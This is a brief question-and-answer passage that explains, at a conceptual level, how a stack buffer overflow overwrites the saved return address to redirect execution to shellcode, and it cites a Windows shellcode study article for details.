What is the core principle behind exploiting a stack overflow with shellcode?

A stack overflow occurs when a buffer is overwritten beyond its allocated length, corrupting the saved return address on the stack. When the function returns, the overwritten return address redirects execution to shellcode placed in the buffer. This technique is demonstrated in detail in the Windows Shellcode Study Notes: Exploitation and Optimization of Shellcode in Stack Overflow article, which shows how to calculate the offset and overwrite the return address with the shellcode’s starting address.